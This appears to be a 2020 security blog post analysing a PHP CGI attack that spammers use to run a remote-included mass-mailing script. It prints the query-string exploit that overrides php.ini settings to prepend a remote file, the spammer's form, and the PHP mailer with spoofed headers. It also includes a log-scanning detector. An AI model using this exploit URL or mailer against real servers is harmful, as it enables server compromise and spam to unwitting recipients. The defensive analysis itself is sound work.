Dissecting e-mail spamming hack based on PHP CGI

Created: 24 Jul 2020 18:27:44, in Security

In this article, more out of curiosity than for a good reason, I look at one way e-mail spam gets sent through hacked PHP CGI setups. The scenario goes like this: a carefully crafted URL changes the PHP configuration to enable remote file inclusion into a script executed by a local PHP CGI setup. The included file consists of an HTML form and a PHP script. The latter sends a message to the e-mail addresses specified in the spammer-submitted form. Below is how this scenario might show up in your HTTP server's log files and get executed on your server.

URL and input parameters

To include a file with custom code into a local PHP script, a spammer uses a URL like the one right below:


/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://[domain-removed]/x.txt

Once decoded the URL looks like this:


/index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://[domain-removed]/x.txt

The options passed in the URL rely on the PHP interpreter's -d switch, which sets a php.ini directive from the command line (php -d directive=value). In a vulnerable PHP CGI setup the query string reaches the php-cgi binary as command-line arguments, so every -d in the URL overrides the configuration for that single request.

Here is what configuration options get changed / enabled in the URL:

  • safe_mode - switch off safe mode (generates an error in server logs since PHP 5.4, where the directive no longer exists),

  • disable_functions - enable any PHP function for execution,

  • allow_url_fopen - allow retrieval of files from a remote host,

  • allow_url_include - allow inclusion of files from a remote host,

  • auto_prepend_file - prepend the content of the given (here remote) file to the executed script.
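The URL above and the directive list are also what a defender has to look for in access logs, and the raw log form is URL-encoded (=, and sometimes even the leading -, arrive as %3d and %2d). The following script is an added example, not code from the article: it parses Apache/nginx "combined" log lines, decodes the request target, extracts every -dNAME=VALUE php.ini override, ranks the ones from the list above as high risk and pulls out any remote URL handed to auto_prepend_file (or auto_append_file). The log lines, IP addresses and the remote.example host are constructed sample data; the function and constant names are my own.

```python
"""Detect PHP CGI '-d' directive injection in web server access logs.

Added example (not part of the original article). Assumes the common
Apache/nginx "combined" log format. All sample data below is constructed.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus, urlsplit

# php.ini directives that the article shows being overridden from the URL;
# seeing any of them in a query string is a strong indicator of this attack.
DANGEROUS_DIRECTIVES = {
    "safe_mode", "disable_functions", "allow_url_fopen",
    "allow_url_include", "auto_prepend_file", "auto_append_file",
}

# Only the leading fields of a combined log line are needed here.
COMBINED_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# A php-cgi style directive override after decoding: -dNAME=VALUE
DIRECTIVE_RE = re.compile(r"-d\s*([A-Za-z_][A-Za-z0-9_.]*)=(\S*)")

# Constructed sample log lines: one attack as shown in the article (with a
# placeholder host), two benign requests, and one fully percent-encoded variant.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Jul/2020:18:00:01 +0000] "GET /index.php?-dsafe_mode%3dOff'
    '+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn'
    '+-dauto_prepend_file%3dhttp://remote.example/x.txt HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Jul/2020:18:00:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [24/Jul/2020:18:00:03 +0000] "GET /search.php?q=-debug+mode HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [24/Jul/2020:18:00:04 +0000] "GET /index.php?%2ddallow_url_include%3dOn HTTP/1.1" 200 1234 "-" "curl/7.68.0"',
]


def decode_query(target: str) -> str:
    """Return the percent-decoded query string of a request target ('' if none).

    unquote_plus turns both '+' and '%20' into spaces and '%2d' into '-', which is
    exactly what php-cgi would have seen as argument separators and switches.
    """
    return unquote_plus(urlsplit(target).query)


def extract_directives(decoded_query: str) -> Dict[str, str]:
    """Map every -dNAME=VALUE override found in a decoded query string to its value."""
    return {name: value for name, value in DIRECTIVE_RE.findall(decoded_query)}


def analyze_line(line: str) -> Optional[dict]:
    """Parse one combined log line; return a finding dict or None if unparseable."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    directives = extract_directives(decode_query(m["target"]))
    # A remote URL in auto_prepend_file/auto_append_file is the remote file inclusion itself.
    remote_files = [
        value for name, value in directives.items()
        if name in ("auto_prepend_file", "auto_append_file")
        and re.match(r"(https?|ftp)://", value, re.IGNORECASE)
    ]
    return {
        "ip": m["ip"],
        "time": m["time"],
        "path": urlsplit(m["target"]).path,
        "directives": directives,
        "high_risk": sorted(set(directives) & DANGEROUS_DIRECTIVES),
        "remote_files": remote_files,
        # Any -d override in a query string is abnormal for a web request.
        "suspicious": bool(directives),
    }


def scan(lines: List[str]) -> List[dict]:
    """Return findings for every line that carries php-cgi directive injection."""
    return [r for r in map(analyze_line, lines) if r and r["suspicious"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['path']} "
              f"high_risk={hit['high_risk']} remote_files={hit['remote_files']}")
```

The decoding step matters more than the pattern itself: a rule that greps the raw log for the literal string "-d" misses the %2dd form in the last sample line, while a rule that does not require the = sign fires on ordinary query values such as q=-debug.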

Once the content of file x.txt is successfully prepended, the spammer gets access to the following form (some of the content is in Portuguese; the script likely originated in Brazil):


<form action="" method="post" enctype="multipart/form-data" name="form1">
  <input type="hidden" name="veio" value="sim">
  <input name="assunto" type="text" value="" class="form" id="assunto">
  <textarea name="html" rows="8" wrap="VIRTUAL" class="form" id="html"></textarea>
  <textarea name="emails" rows="8" wrap="VIRTUAL" class="form" id="emails"></textarea>
  <input type="submit" name="Submit" id="enviar" value="Enviar">
</form>

The spammer uses the form to specify the e-mail subject and message as well as the addresses to send spam to.

The form is backed by the following PHP script.


if(isset($_POST['veio'])){
  $testa = $_POST['veio'];
} else {
  $testa = "";
}

if($testa != "") {
  // e-mail message
  $message = $_POST['html'];
  // e-mail subject 
  $subject = $_POST['assunto'];
  // victim addresses
  $to = $_POST['emails'];

  $email = explode("\n", $to);
  $message = stripslashes($message);
	
  $i = 0;
  $count = 1;

  while(isset($email[$i])) {
    $ok = "ok";
    $gera = rand(1,100000);
    $headers  = "MIME-Version: 1.0\n";
    $headers .= "Content-type: text/html; charset=iso-8859-1\n";
    $headers .= "X-Mailer: Microsoft Office Outlook, Build 17.551210\n";
    $headers .= "Content-Transfer-encoding: 8bit\n";
    $headers .= "From: ".$email[$i]."\n";
    $headers .= "Reply-To: $email[$i]\n";
    $headers .= "Return-Path: $email[$i]\n";
    $headers .= "X-Mailer: iGMail [www.ig.com.br]\n";
    $headers .= "X-Originating-Email: $email[$i]\n";
    $headers .= "X-Sender: $email[$i]\n";
    $headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\r\n";

    // send it
    if(mail($email[$i], $subject." (".$gera.")", $message." (".$gera.")", $headers))
      echo "<font color=gren>* N&#1098;mero: $count <b>".$email[$i]."</b> <font color=LightSeaGreen>ENVIADO....!</font><br><hr>";
    else
      echo "<font color=red>* N&#1098;mero: $count <b>".$email[$i]."</b> <font color=red>ERRO AO ENVIAR</font><br><hr>";
    
    $i++;
    $count++;
  } 

  $count--;
  if($ok == "ok"){
     // end of shipment
     echo "[Fim do Envio]"; 
  }
} 

The only interesting bit apart from the headers is mail(). The script calls the function once per line of the submitted address list to send the spam to those addresses.

Conclusion

The technique described in this article has been around for a long time and is geared towards older PHP versions and CGI setups. Nonetheless, spammers still try to find poorly maintained and vulnerable hosts to leverage it. URLs like the one described in this article show up in my server logs regularly. I'm sure you will find something similar in yours too.

This post was updated on 24 Jul 2020 20:07:26

Tags:  php 


Author, Copyright and citation

Author

Sylwester Wojnowski

Author of the above article, Sylwester Wojnowski, enjoys writing computer code in PHP, JavaScript and BASH, and some other things he wrote more about on the About page of this website.

Copyrights

©Copyright, 2020 Sylwester Wojnowski. This article may not be reproduced or published as a whole or in parts without permission from the author. If you share it, please give author credit and do not remove embedded links.

Computer code, if present in the article, is excluded from the above and licensed under GPLv3.

Citation

Cite this article as:

Wojnowski, Sylwester. "Dissecting e-mail spamming hack based on PHP CGI." From sWWW - Code For The Web . https://wojnowski.net.pl//main/index/dissecting-e-mail-spamming-hack-based-on-php-cgi
